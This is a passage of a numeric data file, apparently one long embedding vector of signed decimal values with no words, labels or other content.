91,0.013843323,-0.003674211,0.011649783,-0.012170682,0.012564191,-0.01301491,0.0017331332,0.022764286,-0.015157496,-0.008818604,0.00003707716,0.0076939235,0.0072383,-0.024374476,0.023640452,0.0060134646,0.025316646,0.01089911,-0.027829941,0.02100929,0.017288078,0.016372342,0.020086445,-0.03721414,0.02261399,0.009861595,0.026575463,-0.003712995,-0.012257431,-0.016010728,0.0014680881,-0.0202709,0.005060489,0.0041766847,0.022337638,-0.016617771,-0.005154358,-0.010871797,-0.020389332,0.000038893304,0.0082152,-0.0030637332,0.032986727,0.0074145566,-0.00923654,-0.022476446,-0.00233369,0.003879946,0.005214379,0.0021360188,-0.022802936,0.013281974,-0.027239708,0.01687656,-0.00854766,0.029426662,-0.0038045624,0.027892064,-0.013761114,0.0040554786,0.017785683,-0.005591601,0.013355823,0.0017542397,-0.006957608,-0.006482935,0.012822535,-0.0055799778,-0.03125416,0.00021034793,0.01790652,-0.0031555013,-0.013362814,-0.015548466,-0.0018201881,-0.009099825,-0.0058360994,0.0045757415,-0.003565426,0.00023267236,0.027982328,0.027522722,-0.005594275,0.012306608,0.026042178,-0.0033406527,-0.0028381352,-0.009479329,-0.0029202993,0.007360184,0.016233714,0.013757067,0.03208588,0.011306383,-0.041984666,0.0046306252,0.006189969,-0.00824964,-0.0069929133,0.024292925,0.0028131693,0.026254756,-0.006768183,0.023380836,0.016560132,-0.005113759,0.017966421,0.020177148,0.002952561,0.027090287,-0.026559245,-0.008093593,-0.0020485756,0.017868942,-0.016237551,-0.0012072324,0.010021366,0.013351216,-0.016729314,-0.021765055,-0.014296636,0.04695758,-0.012448812,0.013108365,-0.006647104,-0.015132873,0.014897365,0.008848622,0.07430035,-0.008102591,-0.021905249,-0.011732824,0.0059819915,0.00789063,-0.0013446376,0.0018544411,-0.022121724,0.020483349,-0.005081521,0.016911315,0.009907511,0.038609486,-0.023348503,-0.012783739,-0.0002621103,0.00069166755,-0.010245785,-0.010287049,0.012064681,-0.0016210375,-0.0019410155,-0.032201488,-0.014260885,-0.018135484,0.030121563,0.0013360505,-0.0045893276,0.012344715,-0.018924946,0.01572861,-0.010746658,-0.016228788,0.0036710443,0.004177718,-0.012066169,-0.0026621253,-0.00042854485,0.02131499,0.012712318,0.0035572012,-0.0042441734,0.0156546,0.005552842,-0.006643202,-0.022619827,0.008049807,0.00045486187,-0.012124166,-0.014045702,0.011039115,0.010460459,-0.006864356,-0.009619195,-0.008124865,-0.0067601516,0.016164888,-0.011926067,0.00003829586,0.006813585,0.0018051241,-0.010109199,-0.021738239,-0.007379693,-0.00044668678,0.0008227261,-0.019130291,-0.0059583285,-0.022866283,0.00902724,-0.0013594594,0.012393219,0.008811702,0.0022842179,0.010117923,-0.012980044,0.024696711,0.02063075,-0.006845954,-0.0030046508,0.009847798,0.0032426708,-0.0138857765,-0.005793648,0.012688365,-0.0189964,-0.0018212654,0.019963544,-0.0038344471,0.014990443,-0.0072049336,-0.001806021,-0.00042320977,0.006109713,0.015114369,-0.005104853,-0.009164927,0.0002627161,0.0016089549,-0.0030997219,-0.028487083,-0.01794893,0.03295317,-0.0024999122,0.010689994,-0.010866249,0.005655577,0.014463031,-0.022890931,0.008317378,-0.08141729,0.004909756,0.018941326,0.010554848,-0.0041557103,0.038568094,-0.02003532,0.016645858,0.004790454,-0.021998094,0.011297469,-0.016453864,0.0065007014,0.0059193843,0.026913932,-0.00088357704,-0.00960175,-0.020305825,0.0017724014,-0.03398775,0.014225898,0.012130712,0.004199943,0.010432357,-0.00055754173,0.0067838193,0.007884983,0.009830541,-0.0018255953,0.00865476,0.027765539,0.021815825,0.010205419,-0.00556525,0.013108165,-0.018100856,-0.008220759,-0.00063623296,-0.018998351,-0.0057955263,0.0038770353,-0.010023594,-0.007993403,-0.0014979217,-0.0050418596,0.022261336,-0.024221126,0.010289323,-0.012059182,0.03141752,-0.014248305,0.005821654,-0.0028087967,-0.0012946235,-0.0058642663,-0.0006933721,-0.0078225555,0.02434646,-0.015186669,0.000583605,-0.0047376333,0.030480133,0.0073044677,0.0053316834,0.0013078176,0.025775585,0.017703881,-0.005423866,0.012214638,0.0111544235,0.00054628076,0.018495088,0.025482202,0.007421819,0.023109837,0.0029957714,0.009231767,0.0020108975,0.007371212,-0.009653672,-0.00271363,-0.015595351,-0.022772145,0.0081138555,0.0056460225,-0.022316907,0.01189348,-0.01720137,0.005850818,-0.012582711,-0.0144551005,-0.00046405423,-0.015410195,0.0086117815,0.0039327415,0.0036322833,-0.0081759775,-0.035381816,-0.027085606,0.03172329,0.028068868,-0.014248144,-0.014628723,-0.015042827,-0.009230197,-0.017261533,-0.020400133,-0.03205921,-0.00021963107,0.03357771,-0.008718034,0.033343427,0.008548046,-0.00059269957,0.0212128,0.02278216,-0.003748033,0.0063759363,-0.0010793898,-0.014849522,-0.00016707579,0.021084221,0.012843703,-0.017298523,-0.016446054,0.0048406012,-0.0011014979,-0.003944513,0.00007849689,0.013785226,0.028237594,-0.0010949644,-0.009440399,0.008551914,-0.014873563,-0.008875454,0.008723526,-0.03998221,-0.017065799,-0.016255151,0.0001252611,-0.020528115,0.022563947,-0.0066630323,0.035217583,0.005004953,0.009245996,0.00018391073,-0.0020134458,0.012875127,0.010938335,0.006676201,-0.015579204,-0.033192433,-0.027763536,0.04208806,-0.020560421,0.0049222996,-0.012478041,-0.020459486,-0.014086381,-0.006258833,0.006932265,-0.0047401334,-0.0020398996,0.0024128857,-0.024264436,0.022614432,-0.0013990947,0.001675728,0.00082986825,-0.0011646585,-0.012750318,-0.011793393,-0.005169895,0.00044872006,-0.022777542,0.003382448,-0.009588611,-0.0056077354,0.000105338906,-0.02136369,-0.014549043,0.00042565807,0.0044406643,-0.0044044615,0.02008896,-0.008935416,0.006661034,-0.011468641,0.0010972719,0.010892925,0.018696284,-0.036717564,-0.0075063775,-0.012134838,-0.009533509,0.02369425,0.019629328,0.005256093,0.035827428,-0.010906009,-0.027854178,0.008909609,0.0018278955,-0.0040080054,-0.003223378,0.007192041,-0.012589568,-0.010660547,0.013026834,-0.0067920256,0.008944907,0.0015708936,0.0037473077,0.008780601,0.018746814,-0.009876388,-0.0018727037,0.016376402,0.004628071,-0.017988238,0.0022566756,0.008324575,0.0063664773,-0.019801665,-0.0037972415,0.011011486,-0.0005929814,0.021413539,-0.0066988855,0.014296063,-0.015477938,-0.02401439,0.005533281,-0.0015450075,0.00094224216,0.002297398,-0.009642632,0.0048668077,0.008940114,0.021663755,-0.018384174,0.010102037,-0.003297986,0.011433704,0.011931243,-0.019637594,-0.014389543,-0.016077863,-0.010895632,-0.030822529,0.0055874893,-0.018864434,0.011404303,0.008940869,-0.013757931,0.011515685,-0.0015036532,-0.020122482,0.0066911667,0.012198623,-0.01032051,-0.008585594,0.0033761647,0.008172223,-0.010180748,-0.0049745794,-0.0007524867,0.02199836,-0.011422607,0.023137417,-0.006075047,0.013298652,-0.002996198,-0.001323726,-0.015919972,-0.017960042,0.0023285658,-0.020056339,-0.0009851176,0.008152236,0.005404785,-0.0044978983,0.012798025,-0.027431622,-0.007529873,0.017545566,0.006453796,-0.009545426,-0.0040094,0.010832638,0.009888561,-0.008946483,0.01622589,-0.004111761,-0.05346994,0.021693472,0.01945705,0.0035231486,-0.003531635,0.0037336885,-0.020232294,-0.003917306,0.028967636,-0.020495204,0.0017057013,-0.005293072,-0.0144875515,-0.0116962725,0.015784234,-0.018866321,-0.021759542,0.0076766186,0.017999575,0.0016178957,-0.014847442,-0.005089221,0.008851911,0.013577708,0.024604684,-0.01908171,0.006478174,-0.0043352377,-0.0062851864,0.008596314,0.024380507,0.019130025,-0.012814872,-0.00016062787,0.002669755,-0.02802151,0.011954893,0.002078737,-0.010032469,-0.0071016275,-0.0021741726,-0.0028396335,-0.006931761,0.04117805,-0.016732715,-0.013504578,0.004507607,-0.017765483,-0.0083538955,-0.0368822,0.033263583,0.0015755947,-0.005761869,0.017097518,0.0061955536,0.020618016,0.0007546055,0.00782634,0.0030694052,-0.006533994,0.011374358,-0.00020246216,0.0011973332,0.02089685,-0.02260916,-0.0055538323,0.011474608,-0.018884791,0.014751169,-0.008653099,-0.013064433,0.0035083916,-0.0092802895,0.0014850217,-0.016431019,0.02730355,0.017242942,-0.01638429,-0.0024032672,-0.007046837,0.000041300234,0.0016810189,0.0030057395,0.0053068334,-0.024148978,0.013735189,-0.010393464,0.016578672,0.0025805407,-0.0055144243,0.013608232,0.0025005538,-0.0027533984,0.0017243043,-0.014751658,0.04040284,0.023228742,0.013472766,-0.0034229357,0.015384822,0.027163323,-0.004150138,-0.00732018,0.029507764,-0.015650002,0.000546107,0.012363995,-0.015492354,0.015779054,0.010420857,0.0012830512,0.0020656614,0.009643129,-0.0047111595,0.012254585,-0.0044824923,-0.015292571,0.028110038,0.0388821,0.01310987,-0.0042953477,-0.0030158502,0.0071357028,0.0021468436,-0.021992255,-0.020845039,0.019827608,-0.006765916,-0.01947342,0.018671416,-0.0076031587,0.019415246,-0.020461876,-0.0016548734,-0.00006835488,-0.0046078064,-0.011472005,-0.011732427,-0.011323719,0.012039839,-0.0012188468,-0.007325684,-0.022261541,0.003006974,-0.0008155019,-0.00664563,-0.007338307,0.007973209,-0.004147936,0.010861539,-0.005867938,-0.016363967,0.009836432,-0.004832633,-0.025548771,0.021832919,0.0033474013,-0.033321906,0.010232839,-0.002297769,-0.013661556,-0.023370879,0.0032768731,-0.0012418678,-0.017308585,-0.02204544,-0.00882882,0.021237941,-0.004950834,-0.010145302,0.0033340843,0.010468848,0.011187279,0.018898867,0.010934968,-0.008872479,0.022317559,-0.009868461,-0.0050402754,0.012107527,-0.005235923,0.012364827,-0.0061282064,0.008234698,0.025629934,-0.016213404,0.003964596,0.0010363482,-0.022689587,-0.016484637,-0.000812583,0.0074453764,0.009794947,0.021664433,-0.020754999,0.010442533,-0.009732296,-0.0025088792,-0.0040925667,0.010795722,-0.021993881,0.017825974,0.0042155916,-0.0021230718,-0.016507993,-0.005122056,0.015282768,-0.0071692695,-0.019578978,-0.02138726,-0.023109019,-0.012396382,-0.031664226,0.0045165783,-0.0069742855,0.008212121,-0.015865732,0.007377173,0.023473471,-0.01675145,0.013477384,-0.0057919994,0.012307105,0.0028830955,0.010405347,0.0005103108,0.016198814,-0.0032728503,0.008052206,-0.004837167,0.021623379,-0.03354023,0.03677773,0.017565763,-0.01751274,0.0061654574,-0.010264575,-0.00008573631,-0.010557303,-0.02813835,0.0010956583,-0.002674221,0.00045823722,0.0010851817,0.010995337,0.043834087,0.011955343,-0.011098714,-0.0032413343,0.0028143807,0.00377405,-0.011069698,0.017077792,-0.0046603945,-0.016810983,-0.0018252103,-0.007266053,-0.019806018,-0.011257745,-0.00011000934,0.0074884715,-0.008846253,-0.01090245,0.020250391,0.00025781716,-0.0063629895,0.028268948,0.022547463,0.0144804055,-0.013422861,-0.0054152953,-0.012561025,0.012173518,0.008450355,0.0009910641,-0.0064843805,-0.017845016,-0.0039945664,0.0078091426,-0.00017246773,0.0038867367,0.009185508,0.013532863,-0.026794394,0.0077024056,0.019678278,-0.0035866417,-0.029366285,0.020242754,-0.0077303974,0.0066313343,0.012496649,0.012554965,0.020246662,0.014354181,-0.019016821,0.009560354,-0.0039946903,0.000300971,-0.011360574,0.012543764,-0.0334625,-0.0149818435,-0.01589233,-0.013900901,-0.0042818193,0.010382327,0.0009857486,0.00021635614,0.0014824221,-0.020782046,-0.021426132,0.01755071,-0.032260332,0.00006775237,-0.011592627,0.017403826,0.010077487,-0.010955146,0.011619901,0.0108298175,-0.009829194,-0.0015896672,0.015451739,-0.0021115667,0.031237762,0.013202704,0.0182151,-0.0064721983,0.003924656,-0.006989559,-0.0014942234,-0.0020784056,0.015569945,-0.0008184578,0.00080052204,0.0015160196,-0.014021686,-0.0028902604,0.0109434,0.0060166884,-0.022587597,0.07507441,-0.007634597,0.008119877,0.0050207623,-0.010919759,0.028312292,0.0074817804,-0.014241591,0.014451015,0.005466634,-0.02218427,0.0024490058,-0.0031304208,0.021049643,0.007673196,0.0110285785,0.0048202127,0.003647203,0.009298869,-0.01099169,-0.001884324,0.0087473355,-0.0042771334,-0.0026492057,0.011259582,-0.013720013,0.015164986,-0.024964567,-0.013273199,0.011026406,0.0001812942,-0.017489554,-0.0108683,0.012240894,0.02740305,0.00389045,-0.011365226,0.0071265223,-0.0017112971,-0.015174671,0.030680679,0.005191229,-0.0013898305,-0.0020990209,0.01038572,-0.008081171,0.064203136,0.023163728,0.022429748,-0.0019483975,0.003571562,0.019214448,-0.006587881,0.015432711,-0.0014614826,-0.009926231,0.0238832,0.008994069,-0.013575696,0.017977312,0.006826723,-0.017404042,-0.0005266482,0.008117714,0.018138299,-0.01591322,0.009481761,-0.005105236,0.0011819334,-0.0147420745,-0.010741549,0.0204886,-0.013855764,0.0072335633,0.019023778,-0.025578985,-0.019702632,-0.01546106,0.0149855735,0.03425509,0.002631141,-0.07613732,0.01439762,0.24950959,0.009808266,0.01803477,0.020064767,-0.00031035757,0.0028628053,-0.12173743,-0.0013658478,-0.0102741,-0.0074739303,-0.014199674,-0.015898075,-0.017907519,0.01568336,0.0068814647,0.026635075,0.010410913,-0.03871934,0.011733099,-0.015008418,0.00022139968,-0.014978346,0.006711941,0.012467132,-0.020310279,-0.011718582,0.023170337,-0.017027302,-0.023703681,0.008949606,-0.00048748625,0.0100671835,0.0047257873,0.008946962,-0.029215876,0.0047582407,0.016133681,0.007277758,0.0012182222,-0.022030527,0.0012588446,-0.0009064051,-0.025480581,-0.033467617,-0.17060296,-0.01302836,0.010405803,-0.014284749,0.014127156,0.011248339,0.01600147,-0.013702487,0.0058818166,-0.031120481,-0.0076179164,0.0053401277,0.005393481,0.0031533479,0.0051584453,0.012647154,-0.001891939,0.0025900886,0.012262029,0.009556188,0.011346325,0.0074516023,-0.036910467,-0.03147661,-0.0038549763,-0.01717574,-0.011827729,0.021609543,-0.003953661,0.0017637875,-0.005061152,0.008677212,-0.023814594,-0.009286818,-0.023758933,-0.035258178,-0.005900858,0.011474265,-0.010059948,-0.010106019,0.007643914,0.004717057,-0.01795285,0.02196928,0.010404127,0.033464283,0.0046914946,0.0079376735,-0.005623792,0.018737005,0.025803795,-0.0020284678,-0.02479356,0.0014374799,-0.014241937,0.017705295,-0.019443205,-0.018098392,-0.0122588705,0.00077258406,-0.0033401407,0.00044340367,-0.017242674,-0.020780029,0.023373924,-0.008726591,0.009803982,-0.026194865,0.0015121897,0.00041072085,0.00036934,0.005384684,0.030997217,-0.020145623,0.0024119143,0.013880207,-0.0015213822,0.0031717608,0.009365106,-0.006409003,-0.022523778,-0.021620153,-0.0028988803,-0.020519596,-0.0007002145,0.002756896,0.004141651,-0.02232965,-0.008512831,0.010035682,0.0142018655,-0.0001621679,0.04053807,0.012750738,0.005858975,-0.0066541024,0.014205812,-0.014085952,-0.030542322,0.0151428385,0.0033945602,-0.019029928,-0.014711779,0.0071090925,-0.028028088,-0.0024021014,-0.0035471322,-0.0043231673,-0.021519616,-0.0027821544,-0.018983684,0.010333602,0.00040342458,-0.017697336,-0.0044229,-0.036563303,0.017688973,0.004070454,0.0019865069,-0.0027222468,-0.02455268,-0.011321046,-0.002651163,0.009092956,0.046770733,0.0038131266,-0.019269824,-0.00012944518,0.0023403596,-0.040483307,-0.006170634,0.0047451784,-0.0029334994,0.0038442297,0.0071084457,0.009469631,-0.010293999,-0.018781,-0.025768112,-0.0016927116,0.008001501,-0.011218949,-0.00030024545,-0.013406893,0.02426482,0.004471172,0.028770637,-0.017624663,0.011416928,-0.02191546,-0.020666253,0.049598254,0.009764993,-0.026029613,-0.0029924046,0.091561496,-0.017546521,-0.021092093,-0.015529325,-0.016122436,0.016750785,0.023512203,-0.013137172,-0.020065375,-0.013773164,-0.029806089,-0.017517459,-0.0053770016,0.02038433,-0.012022369,0.04079899,0.006715669,0.0125802765,0.0063252933,0.002310174,0.003998557,-0.018890593,-0.0011147857,0.026610814,0.014911767,0.00040053276,0.007879804,-0.000030863925,-0.015345655,0.007610896,-0.007167775,0.0024198687,-0.0087190615,0.00064621476,0.011398511,-0.051122498,-0.023511147,-0.005931843,0.012972382,-0.013776668,0.0007655795,0.006061372,0.0018051495,-0.023745243,0.03371557,0.004536264,-0.0065028872,0.02382846,0.007597618,0.016468696,-0.000042679763,0.02132141,0.017121628,-0.010677407,0.0035901163,-0.008690979,0.011341076,-0.009011746,-0.004029544,0.0035017387,0.031714454,-0.018698715,-0.009091475,-0.0026793682,-0.006848487,0.01581504,0.012647791,0.013026777,-0.0009317934,0.02170576,-0.00838508,-0.011259825,0.0066681667,0.0049155583,-0.0012044321,-0.007907261,-0.016933348,-0.009586301,-0.014798025,-0.012011452,0.01052667,0.011597544,0.0023545583,0.0210537,-0.019341929,-0.05713579,0.006306264,0.0007381682,-0.031033877,0.016734939,0.005525449,0.015113162,0.037095137,0.0065656835,0.009904012,-0.01690313,-0.005609525,0.0053259656,-0.011210493,-0.006888272,0.0040546306,0.012819045,-0.01155955,-0.010782731,-0.013667293,-0.028769474,-0.017490668,-0.021381207,0.004270069,-0.018267702,-0.016209032,-0.005158712,0.016614584,-0.02243034,-0.0026998634,0.042276774,-0.007955671,-0.005805742,0.012505761,-0.0123455245,-0.024430357,-0.008571257,0.009838682,-0.00026618573,0.0412248,0.010392488,-0.017273793,0.011260911,-0.030726511,0.020497521,0.010994282,0.030011067,-0.008655606,0.013651377,0.014012256,-0.006322331,0.025009727,-0.007869057,0.0060452977,-0.0027915281,-0.019527117,0.0049197506,-0.01073588,-0.0006815986,0.007815036,0.008720889,0.011314519,0.013349121,-0.010657915,0.008954082,-0.014924246,-0.014442718,0.0043927073,-0.011138365,-0.013648185,0.020710856,-0.015271423,0.023856115,-0.00079705066,-0.0029516618,-0.017775957,0.022836518,0.0070709297,-0.017494332,-0.020473402,0.019934613,0.041965086,-0.020382578,0.013017118,0.0019016014,-0.024519863,-0.018892428,0.012699807,0.012895193,0.009755876,0.013721011,0.008680918,-0.012415259,-0.020676926,0.005551579,0.02579533,0.012922842,-0.028197162,-0.010221813,-0.010818089,-0.017596578,-0.011929593,0.025903197,-0.0064906254,0.009466301,-0.0058399267,-0.00013714455,0.007256722,-0.009278421,-0.018744921,-0.0071079014,0.023950905,-0.0032035697,-0.0013437744,0.02097692,-0.0068578236,0.036442555,-0.010444737,-0.017385494,0.0067470623,-0.0017618121,-0.023313953,-0.008958097,-0.029454129,0.011531921,-0.015628748,0.014547728,-0.023098443,-0.009649372,0.03323472,0.011618359,0.020214766,0.01517021,-0.0069283633,-0.004871452,-0.004830882,0.0007474146,0.024249762,0.0018846092,-0.046016686,-0.011494634,-0.03187486,0.06496127,-0.014251297,0.0021985164,0.0027014997,0.031231457,0.020720335,-0.008279092,0.007820129,-0.016915333,-0.007350968,-0.015916238,-0.045246225,-0.010804337,0.015328778,-0.013464574,-0.03033709,0.0182814,0.0034995144,-0.020322647,0.009189518,-0.004786276,0.0058839107,0.004355761,0.003657622,-0.0030309954,-0.030916315,-0.009293616,0.0045911893,-0.0243209,0.0026063805,-0.019915683,-0.0069840923,-0.010342475,-0.019438714,0.008057708,0.0031210196,-0.0076508974,-0.00706121,0.0027686462,0.009008922,0.01713619,0.012050477,0.008447912,-0.010012383,-0.008127544,-0.008579912,0.026384378,0.005047969,-0.013602697,0.0050397725,-0.008419352,0.019623397,-0.012008012,0.00039142856,0.016555212,0.016463008,-0.0007397576,-0.014250813,0.01975863,0.015797025,0.002318199,-0.015065022,-0.012392204,-0.0013076481,0.034524217,0.026161136,-0.009894297,-0.007605018,-0.008833306,-0.0015870527,-0.019997269,0.038127452,0.013566408,0.0033744923,-0.003182851,-0.015489003,0.012315849,-0.018722752,0.0073711104,0.011344811,0.0021543566,0.0042442256,-0.016312778,-0.004509456,0.0056028552,0.032127928,-0.02930367,-0.016929945,0.003115508,-0.0001495188,0.022312647,0.0012228701,-0.0278744,-0.0061738184,0.0004553695,0.004837769,-0.002325462,-0.0075616906,0.005215711,-0.025645677,-0.007154585,0.002819568,-0.0034150393,-0.011909546,-0.014212158,-0.0049065147,-0.121633194,0.000924458,-0.029580386,-0.013374634,-0.017095257,-0.0023686835,0.009779413,0.07204152,0.0022334768,-0.02817656,0.011549383,0.012592386,0.0046576853,0.018356834,0.0054127104,0.0101774195,0.005536788,-0.011471651,-0.0077290125,-0.007135892,0.008584229,-0.00034253122,-0.014426654,-0.0078793205,-0.0016991374,0.020088183,-0.016459808,0.03126442,0.02656986,0.02928291,0.0036216464,0.015976546,0.019436775,0.01060228,0.0037100154,0.0020171104,0.000015401909,0.0076777684,-0.00071183057,-0.00047496607,0.004958083,-0.0044586253,-0.006173277,0.016899379,0.0052271276,0.0015553528,0.012576189,0.017536258,0.033884123,0.006059787,0.0068297572,-0.008822297,0.022150328,-0.008083633,0.0022014154,-0.0009242075,-0.024791474,0.010330813,-0.0049416497,-0.010217096,0.015060951,0.010865687,-0.0030725326,-0.008774583,-0.0025789158,0.012622689,0.0009979305,-0.00031214318,-0.01544832,-0.0031462172,0.0008221171,0.0099489,-0.010132389,-0.0066134864,-0.022613602,0.0021258667,0.012007155,0.014683441,0.015883481,0.015750362,-0.011237813,-0.005296918,-0.009044052,-0.00032935268,0.0047483267,0.007901365,0.011438663,0.0055783307,-0.020022174,-0.015201964,0.00014269879,0.007395926,-0.02153482,-0.03182603,-0.011349767,0.027120603,0.0022382713,0.023523582,0.011813059,-0.004193642,0.015384206,-0.004750122,-0.013134274,-0.0062701833,-0.1343537,-0.012078032,0.03201912,0.005998312,-0.02028443,-0.012697529,-0.00646534,-0.0014696328,0.00568256,-0.008150923,-0.00939104,0.022350727,0.014959508,-0.004983644,0.01159707,-0.011578965,-0.027417043,0.022167895,-0.0024389634,-0.004476247,0.011105623,0.007868004,-0.045880944,-0.010331917,0.0011005106,-0.010565907,0.006109112,0.02289559,0.007283268,-0.010779887,-0.003765639,0.012285742,-0.021451375,-0.006512297,0.017115539,-0.026691442,0.0039205845,-0.002227024,0.009444081,0.024052562,0.004596283,-0.023269726,0.009360028,-0.0016542685,0.0043632323,0.020740822,0.0050331578,0.0066176048,0.02078785,0.007162682,0.002974053,0.010074453,-0.005465245,-0.0016108337,-0.0022513645,-0.0074906247,-0.020282447,0.0016089075,-0.031217674,0.01763154,-0.024439666,0.014055337,-0.0048204907,0.004632582,0.0050789947,0.02524678,0.0037464842,0.0045918603,0.020009026,-0.0032086594,-0.008498659,0.012941315,0.037044466,-0.008358456,0.0011869959,0.023743592,-0.00072688144,0.033228274,0.039836593,-0.008729157,0.00020719768,-0.004061007,-0.0055669365,0.010903825,-0.012259967,-0.00065343,0.00081846013,0.02075395,-0.019681834,0.022056881,-0.0031558988,0.017426891,-0.010849706,0.012095053,0.01839651,0.014076679,0.022343896,0.021019155,-0.021019919,-0.0066443756,-0.023463434,-0.019391453,-0.011139096,0.014813956,-0.014586564,-0.0011573989,0.0049507623,-0.0028216466,-0.019590888,0.01093991,0.022692328,0.014177108,-0.024139296,0.019632395,-0.023854243,-0.0009716368,0.0029717,-0.017466143,-0.016562592,0.021250635,0.005286216,0.000029827443,0.0008975062,-0.001868959,-0.01298653,0.00094885426,-0.014134197,0.02687046,0.006610698,-0.013114957,0.0071273325,-0.007852617,0.018577386,-0.023340562,-0.0066350163,0.016136328,0.008911377,0.0064055077,0.017206084,0.0006609654,0.0048567825,0.0053925104,0.02832038,-0.0076428284,0.0014061171,-0.008701263,0.00014224372,-0.0005525889,0.00095298985,0.010024286,-0.024369562,0.001356539,0.022567285,-0.0094408505,-0.02220052,0.0021315324,-0.010408428,-0.005931681,0.013576324,-0.0011733802,-0.00069991563,0.010686014,0.009467803,0.0048260256,0.005708905,-0.0041843364,0.0038649745,-0.01780314,0.006055287,-0.007150589,-0.012533673,-0.011836402,-0.019153668,0.024961166,0.02267545,0.015166736,0.03326378,0.032014012,-0.0039504166,0.023864282,0.013234801,0.0007157637,-0.03031051,-0.0008575786,0.023919545,0.0039406912,-0.011454236,0.00008947718,-0.025625126,-0.0061620274,0.023751916,-0.013479251,-0.028389279,0.0029067935,0.0240127,-0.009703194,-0.009333775,-0.001520094,0.02834311,-0.01345233,-0.010330042,0.01648508,0.010214786,-0.0077565797,-0.005568784,0.015443388,0.0033374066,0.046852704,0.02334764,0.0025461058,-0.009464079,-0.004480706,-0.0020666255,0.016651211,0.024186904,0.008226501,-0.01854195,-0.011888692,0.03348608,-0.0035370612,-0.0023468882,-0.0009632882,0.013021559,-0.012590802,0.0036499524,0.038304918,0.015556532,0.0076498166,-0.0074059875,0.0008515626,0.00393823,0.004569542,-0.003296963,0.015481973,0.0052063176,0.0044170367,0.029803753,-0.0084227165,0.009221623,-0.0071817185,0.0035666274,0.0071232687,0.029583901,0.001043185,-0.0035488596,-0.013012557,0.025117544,-0.0037672895,-0.020351743,0.009641787,0.016232666,-0.02273714,-0.0028364514,-0.0048293546,-0.016084492,-0.0012289493,0.032071613,-0.0024517342,-0.017717842,0.006066875,-0.01628735,-0.0010103475,-0.013353584,-0.00067026337,-0.008857637,-0.014431223,0.009252401,-0.030831555,-0.0007658518,0.0039008132,-0.01900339,0.016728057,0.0044981637,0.018326012,0.018752506,-0.010273378,-0.020552741,-0.009844783,-0.004411517,0.006148748,-0.014175531,-0.021179508,-0.011270331,-0.0075362413,0.0010637298,-0.0004968745,-0.0032492508,0.0016214292,-0.0014924956,0.0029475542,-0.002623101,0.002105769,-0.0047200453,-0.016285837,-0.021989835,-0.0027630804,0.033881325,-0.0068725524,-0.0071698017,0.0009178912,-0.006366127,0.0019763056,-0.0036251976,0.0031368255,0.0026710064,-0.013961585,0.00043104516,0.010215636,0.010727804,-0.0074711507,0.006744942,-0.0009841124,-0.0017148134,0.011224382,0.007472084,0.009734602,-0.028380623,0.006021595,-0.0193492,-0.011445107,-0.014222455,-0.031657882,0.0177546,-0.00070780114,0.027865782,0.0046634353,0.008884936,0.008730361,-0.006159224,0.002169485,0.01876271,0.021578638,-0.010860442,-0.015159903,0.0068106134,0.0029150306,-0.0036344572,0.022139674,-0.010542489,0.018719954,0.004678563,0.021116195,-0.0037607548,-0.029072814,-0.00074758596,-0.0043596304,-0.00079074176,-0.009167766,0.019912405,0.0048165885,-0.020694036,0.008684846,0.009016278,0.027461447,0.007045177,0.015394147,-0.013405999,-0.017101623,0.0021275955,0.0034555686,-0.0066878535,0.009624794,0.016654728,-0.009057584,-0.0036487493,-0.0023968823,-0.014134405,0.020970583,0.0020890713,-0.00535452,-0.018485669,0.004530139,-0.021736795,-0.0124354875,-0.0038041,-0.08461061,0.0051529133,0.007154259,-0.022609172,0.020106876,0.0023688134,-0.023779819,-0.009459941,0.021044375,-0.0010430845,-0.012335905,-0.011795419,0.0018438287,0.009753565,0.010742458,-0.0034002103,0.0123074325,0.005900139,0.013084515,-0.018958768,-0.024210429,0.028190468,0.0068140635,-0.003423287,0.018690823,-0.008858014,-0.009893695,-0.007419002,0.0029835114,0.013826492,-0.0010326193,0.0016880514,-0.009936561,-0.0026375942,0.0034919274,0.003536194,-0.018901067,0.010246746,0.00210327,-0.03138958,0.014121036,0.014151165,0.0076706284,0.0043180245,0.0057810904,0.018173791,-0.009131968,-0.019457156,-0.026914453,-0.0053932676,0.0042715105,0.019669607,-0.014855868,0.023719745,0.016250474,0.0007558,0.0040647886,-0.008143855,0.039973564,0.0024875554,-0.011464892,-0.018429197,0.022777798,-0.026624352,-0.005925507,0.030964058,-0.011073648,0.025225032,-0.019849034,0.004314227,0.015608133,-0.00841167,-0.009635189,0.0004963974,-0.00070477056,0.016518464,-0.020643413,-0.015132462,-0.0037738434,0.0018873664,0.024346756,0.0060264333,0.010944452,-0.0034167285,0.0105490405,0.014280551,-0.0063389544,0.0024644588,0.021513823,0.023690375,0.016789442,-0.0067960145,0.01258092,-0.008821248,-0.013846592,0.018521173,-0.0059712767,-0.005919609,0.020840658,0.008819108,-0.02272244,0.0028901722,0.008196158,-0.004089059,0.012782914,-0.00832955,0.0075765364,-0.001834394,0.009856023,0.0017045703,-0.00051378633,0.018337635,0.043264836,0.011229814,0.021751205,-0.0018424351,0.0021408005,0.02626357,-0.0074303485,0.01002288,-0.03136482,-0.029427005,-0.023988398,0.00008049035,-0.0012570642,0.0050244653,0.0041337935,-0.02278225,-0.0036422221,0.0063611986,-0.017634455,0.018464744,0.029630238,0.028962947,0.00054327917,0.0070890025,0.009061533,-0.010558891,-0.016390665,0.016056735,-0.018264588,-0.048399642,-0.008699764,-0.0014103557,-0.018287757,0.03758088,-0.018720552,0.005004936,-0.003957545,-0.014748047,-0.0025772462,0.0052605583,0.011541434,0.0013512588,-0.01083628,0.016401093,0.031873465,-0.0014725932,-0.0063116383,-0.006620954,0.004868331,0.006277838,0.016678562,0.0032470685,-0.022284498,0.0118558565,0.018727012,-0.010597652,-0.011286613,-0.03234241,-0.021028848,-0.018939396,0.008702914,-0.009509247,-0.012218761,0.025982566,0.02586372,0.018168027,-0.0069042025,-0.004561303,-0.005567264,0.011961916,0.0032395779,-0.00033554275,-0.017425997,-0.011993013,-0.012987713,-0.0009984177,0.008870117,-0.024666293,0.0037452872,0.0073816516,0.008805416,0.011858894,-0.021514667,-0.012640147,0.0024643478,-0.0033336154,0.0060682627,0.009263254,-0.012144616,0.016163213,0.007884714,0.01570375,0.0007192675,0.014457245,-0.0031513069,0.0052115354,-0.0103359055,0.012333018,0.006596207,0.02961453,0.0016763881,0.101352885,0.028074365,0.005864153,0.012223496,0.0060441406,-0.0013876104,0.046645816,0.0042209513,0.016638737,-0.0019700385,0.010875581,0.00096814445,-0.009324926,0.004740108,-0.02652696,0.0258481,0.018407779,-0.009710551,-0.0016769095,-0.033548467,0.013783786,-0.035248738,-0.006738153,0.0010199625,0.016410684,-0.0509264,0.0